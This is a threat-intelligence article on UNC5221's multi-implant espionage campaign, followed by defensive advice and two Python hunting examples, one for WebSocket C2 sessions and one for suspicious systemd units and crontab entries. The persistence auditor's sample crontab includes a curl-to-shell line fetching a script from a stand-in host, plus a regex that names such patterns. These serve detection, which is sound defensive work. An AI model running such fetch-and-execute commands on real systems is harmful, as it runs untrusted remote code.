The Incident: A Network of Backdoors
UNC5221, a Chinese espionage group, has been active since at least 2023 and is best known for exploiting zero-day vulnerabilities in edge devices. Its operations form a single sustained campaign rather than a series of isolated breaches: initial access to victim networks and Managed Service Providers (MSPs) dates back to September 2023, and some intrusions went undetected for more than 18 months.
Brickstorm was in use by April 2024, and breaches uncovered by March 2025 showed it had been running undetected for over a year. VerdantBamboo was found on a compromised Egnyte Storage Sync system. One victim organization was breached again after completing remediation that year, a clear sign of deliberate re-entry rather than a one-off intrusion.
UNC5221 targets a broad range of systems: cloud environments such as Microsoft 365; data storage platforms such as Egnyte Storage Sync and Synology NAS devices; virtualization platforms such as VMware vSphere and Dell RecoverPoint for Virtual Machines; edge infrastructure such as pfSense firewalls; and even retired Linux GroupWise email archive servers, alongside MSPs.
Initial access frequently relies on stolen credentials for web SSL VPNs (MITRE ATT&CK T1133, T1078). The attackers have also configured new SSL VPN access on a victim's own firewall to guarantee re-entry. Traffic arriving through the organization's VPN blends with legitimate remote access and, because it appears to originate from a trusted network location, can satisfy location-based Conditional Access policies that would otherwise challenge an unfamiliar login.
How Chinese APT Malware Ensures Persistent Access: The Redundancy Playbook
UNC5221 does not depend on a single implant. It builds an "access portfolio": several independent re-entry mechanisms, each on a different class of system, so that removing one leaves the others intact.
The primary implant is Brickstorm, originally written in Go, with newer variants in Rust. It communicates with its C2 over WebSocket (MITRE ATT&CK T1071.001) and uses a multiplexing library to carry several logical streams over that one connection, so a single long-lived session can serve every operator need while looking like ordinary web traffic. BSD builds have been observed on pfSense firewalls. CISA has warned about its deployment by Chinese actors against VMware vSphere, and Google reported UNC6201 deploying it against Dell RecoverPoint for Virtual Machines.
A second backdoor, Plenet (also identified as Grimbolt), is a previously undocumented cross-platform .NET backdoor that targets Synology NAS appliances. It provides an interactive shell, remote command execution and file manipulation (MITRE ATT&CK T1059, T1070.004) and, like Brickstorm, uses WebSocket C2 with a multiplexing library. It is a separate code base delivering equivalent capabilities on a different class of device.
A third mechanism, AgentPSD, is a Python-based reverse shell (MITRE ATT&CK T1059.006) that serves as a fallback. It is configured to call back to a different domain than Brickstorm, so blocking or sinkholing one C2 does not cut off the other. It is not always used while Brickstorm remains operational, but its presence shows the intent to keep redundant access available.
This multi-implant strategy, combined with living-off-the-land techniques and the exploitation of edge devices, complicates eradication. Backdoors on firewalls, NAS devices and Linux archive servers each constitute a separate entry point, and most of those hosts run no EDR. The group also uses legitimate cloud platforms such as Google Drive for C2 cover (MITRE ATT&CK T1102), a tactic seen in other campaigns, so command traffic resembles normal user activity.
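The WebSocket C2 shared by Brickstorm and Plenet leaves a recognizable shape in proxy and firewall telemetry: one connection, upgraded to WebSocket, held open for hours by a host that has no business chatting with the internet, to a destination almost nobody else in the estate contacts. The following added example (not code from the page or from any vendor report) runs that logic over a few constructed log lines. The CSV layout, the appliance subnet, the thresholds and every hostname are assumptions for illustration.

```python
"""Hunt for long-lived WebSocket sessions opened by appliances.

Added example, not code from the page or from any vendor report. The log
format, subnet range and thresholds below are assumptions for illustration.
"""
from collections import defaultdict
from dataclasses import dataclass
import ipaddress

# Constructed sample in a simplified proxy/firewall export (assumption):
# ts,src_ip,dst_host,dst_port,upgrade_header,duration_s,bytes_out
SAMPLE_LOG = """\
2025-03-01T02:14:07Z,10.10.5.20,updates.vendor.example,443,none,2,1840
2025-03-01T02:15:11Z,10.10.5.20,cdn.static.example,443,none,5,22100
2025-03-01T02:20:00Z,10.10.5.20,api.telemetry.example,443,websocket,86400,98304
2025-03-01T03:01:44Z,10.20.1.15,chat.collab.example,443,websocket,1200,4096
2025-03-01T03:05:10Z,10.20.1.16,chat.collab.example,443,websocket,900,2048
2025-03-01T04:10:00Z,10.10.7.8,api.telemetry.example,443,websocket,43200,51200
2025-03-01T05:00:00Z,10.10.9.3,files.share.example,443,websocket,300,1024
2025-03-01T05:02:00Z,10.20.1.15,files.share.example,443,none,3,512
2025-03-01T05:03:00Z,10.20.1.16,files.share.example,443,none,4,768
"""

# Subnet holding vCenter/ESXi, NAS and firewall management interfaces (assumption).
# Such hosts have little legitimate reason to hold outbound WebSocket sessions.
APPLIANCE_NETS = [ipaddress.ip_network("10.10.0.0/16")]
MIN_DURATION_S = 3600   # a multiplexed C2 tunnel stays up for hours, not seconds
MAX_SRC_PER_DST = 2     # destination reached by very few internal hosts


@dataclass
class Record:
    ts: str
    src: str
    dst: str
    port: int
    upgrade: str
    duration: int
    bytes_out: int


def parse(text):
    """Parse the constructed CSV format into Record objects."""
    recs = []
    for line in text.strip().splitlines():
        ts, src, dst, port, upg, dur, out = line.split(",")
        recs.append(Record(ts, src, dst, int(port), upg, int(dur), int(out)))
    return recs


def is_appliance(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in APPLIANCE_NETS)


def hunt(recs):
    """Return (src, dst, reasons) for WebSocket sessions matching two or more indicators."""
    # Prevalence: how many distinct internal hosts talk to each destination at all,
    # counted over every record so ordinary HTTP traffic also contributes.
    srcs_by_dst = defaultdict(set)
    for r in recs:
        srcs_by_dst[r.dst].add(r.src)

    hits = []
    for r in recs:
        if r.upgrade != "websocket":
            continue
        reasons = []
        if is_appliance(r.src):
            reasons.append("appliance source")
        if r.duration >= MIN_DURATION_S:
            reasons.append(f"long-lived ({r.duration}s)")
        if len(srcs_by_dst[r.dst]) <= MAX_SRC_PER_DST:
            reasons.append(f"rare destination ({len(srcs_by_dst[r.dst])} internal src)")
        if len(reasons) >= 2:
            hits.append((r.src, r.dst, reasons))
    return hits


def hunt_sample():
    return hunt(parse(SAMPLE_LOG))


if __name__ == "__main__":
    for src, dst, reasons in hunt_sample():
        print(f"{src} -> {dst}: {', '.join(reasons)}")
```

On the sample, only the two appliance sessions to api.telemetry.example are flagged; the workstations' chat sessions are short and the appliance's brief session to files.share.example goes to a destination three hosts use. Two caveats: the Upgrade header is only visible where the proxy terminates TLS or the client uses an explicit proxy, so on plain firewall logs you are left with duration and prevalence; and traffic hidden behind Google Drive will not trip this at all, since the destination is common, so that case needs identity telemetry (which account, which user agent, from which host) instead.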
The Real Impact: Re-Breaches and Resource Drain
The practical consequences are significant. An attacker with this access gains deep control over Microsoft 365 environments, enabling long-term espionage and exfiltration of sensitive data (MITRE ATT&CK T1041, T1537) and potentially the forging of tokens for tenant access (T1606). For defenders, the problem extends well beyond the initial compromise. Remediating an incident normally means closure; with UNC5221 it often does not. The re-breach of a victim organization after remediation illustrates this persistence, typically through an implant the first response never found.
Beyond data loss, the sustained drain on security teams is a real cost. Teams spend considerable time hunting, containing and eradicating, only to discover the adversary still has another way in. That erodes confidence in the security posture and exhausts operational capacity. UNC5221's preference for systems without EDR coverage, such as most edge devices and appliances, deliberately exploits a common organizational blind spot.
What We Need to Change: Hunting for Access Portfolios
Against adversaries like UNC5221, the traditional "find and fix" incident response model is insufficient. The hunt must shift from individual malware instances to the entire access portfolio.
When one implant from a sophisticated APT is discovered, the working assumption must be that others exist. Broaden the hunt beyond the Windows fleet to every critical layer: edge infrastructure such as VPNs, firewalls and routers, which often serve as the initial access point; Linux systems such as NAS and archive servers, which are frequently overlooked; Windows services; and cloud environments. Covering all of that requires deliberate threat hunting across heterogeneous systems rather than relying on whatever the EDR happens to see.
Internet-facing edge devices are the prime entry and re-entry surface, and they usually lack EDR coverage and deep logging. Defending them requires regular configuration audits (new VPN users, new administrative accounts, changed rules), log review for anomalous outbound connections, and integrity checks on firmware and configuration. On Windows, investigations should look for unexpected service creation (T1543.003), changed service DLLs, unusual service accounts, and processes launched by services. On Linux, scrutinize cron jobs (T1053.003) and systemd units (T1543.002) for unauthorized additions or modifications.
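The Linux checks above are mechanical enough to script. The following added example (not code from the page) parses systemd unit files and a crontab and flags the two things an implant on a NAS, vCenter appliance or archive server most often needs: a service binary living somewhere a packaged service never would, and a cron command that fetches-and-pipes-to-shell or decodes an inline payload. The heuristics, the unit contents and the crontab are constructed assumptions, as are the paths and hostnames in them.

```python
"""Audit systemd units and crontab entries for unauthorized persistence.

Added example, not code from the page. The heuristics (unusual binary
locations, download-and-execute and decode patterns) and the sample unit
files and crontab are assumptions constructed for illustration.
"""
import re
from pathlib import Path

# Directories a legitimately packaged service binary is unlikely to live in.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/home/", "/root/")
# Fetch-and-pipe-to-shell, inline base64 decoding, or nohup backgrounding.
SUSPICIOUS_CMD = re.compile(
    r"(curl|wget)\b.*\|\s*(ba)?sh\b|base64\s+(-d|--decode)\b|\bnohup\s", re.I)

# Constructed sample units keyed by path (assumption).
SAMPLE_UNITS = {
    "/etc/systemd/system/vmware-sync.service": (
        "[Unit]\nDescription=VMware Sync\nAfter=network.target\n"
        "[Service]\nExecStart=/home/vsphere-ui/.cache/sync -d\nRestart=always\n"
        "[Install]\nWantedBy=multi-user.target\n"),
    "/etc/systemd/system/nginx.service": (
        "[Unit]\nDescription=nginx\n"
        "[Service]\nExecStart=/usr/sbin/nginx -g 'daemon off;'\n"
        "[Install]\nWantedBy=multi-user.target\n"),
}
# Constructed sample crontab in user format (assumption).
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/bin/certbot renew --quiet
*/10 * * * * curl -s http://cdn.update.example/a.sh | sh
30 2 * * * echo aGVsbG8= | base64 -d > /dev/null
"""


def exec_lines(unit_text):
    """Yield (key, command) for Exec* directives, stripping systemd prefixes (-, @, !, +, :)."""
    for line in unit_text.splitlines():
        m = re.match(r"\s*(Exec\w+)\s*=\s*(.*)", line)
        if m:
            yield m.group(1), m.group(2).lstrip("-@!+:").strip()


def audit_units(units):
    """units: {path: contents}. Return (path, reason) findings."""
    findings = []
    for path, text in units.items():
        for key, cmd in exec_lines(text):
            binary = cmd.split()[0] if cmd else ""
            # Hidden directories ("/.cache/") are flagged alongside scratch and home dirs.
            if binary.startswith(SUSPICIOUS_DIRS) or "/." in binary:
                findings.append((path, f"{key} runs from unusual location: {binary}"))
            if SUSPICIOUS_CMD.search(cmd):
                findings.append((path, f"{key} uses download-and-execute or decode pattern"))
    return findings


def audit_crontab(text, label="crontab"):
    """Return (label:line, reason) findings for a crontab in user format."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        s = line.strip()
        if not s or s.startswith("#"):
            continue
        parts = s.split(None, 5)          # 5 time fields + command
        if len(parts) < 6:
            continue                      # env assignment or malformed line
        cmd = parts[5]
        if SUSPICIOUS_CMD.search(cmd):
            findings.append((f"{label}:{n}", "download-and-execute or decode pattern"))
        elif cmd.split()[0].startswith(SUSPICIOUS_DIRS):
            findings.append((f"{label}:{n}", f"runs from unusual location: {cmd.split()[0]}"))
    return findings


def load_units(directory="/etc/systemd/system"):
    """Read every *.service file under a directory into the {path: contents} shape."""
    return {str(p): p.read_text(errors="replace") for p in Path(directory).glob("*.service")}


if __name__ == "__main__":
    for where, why in audit_units(SAMPLE_UNITS) + audit_crontab(SAMPLE_CRONTAB):
        print(f"{where}: {why}")
```

On a live host, pair `audit_units(load_units())` with the same pass over /usr/lib/systemd/system and the per-user crontabs under /var/spool/cron, and compare unit file timestamps and hashes against the package manager's manifest (rpm -V or dpkg -V) so that an implant installed by editing an existing unit, rather than adding a new one, does not slip past the location heuristic.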
Effective defense requires correlating telemetry across endpoint, identity, proxy, DNS and cloud storage. A detection on one system may be a symptom of a broader access strategy rather than an isolated event, and that pattern only becomes visible when the sources sit together in a unified security data lake or SIEM.
For high-risk systems, especially those with broad network reach such as VPN concentrators or management jump hosts, a full rebuild and complete re-credentialing is usually the only safe option: removing the implant alone risks leaving hidden persistence in place. Foundational controls such as privileged access management, network segmentation, egress monitoring (T1041), an accurate asset inventory, and sufficient log retention across the whole estate are prerequisites for effective defense, not advanced measures.
After any remediation, a defined watch period and a renewed hunt are essential. UNC5221 has demonstrated durable, quiet and reusable access, and treating each detection as an isolated event invites repeated compromise. The defensive posture therefore has to anticipate and counter the adversary's full range of access methods, not just the one implant that happened to be found.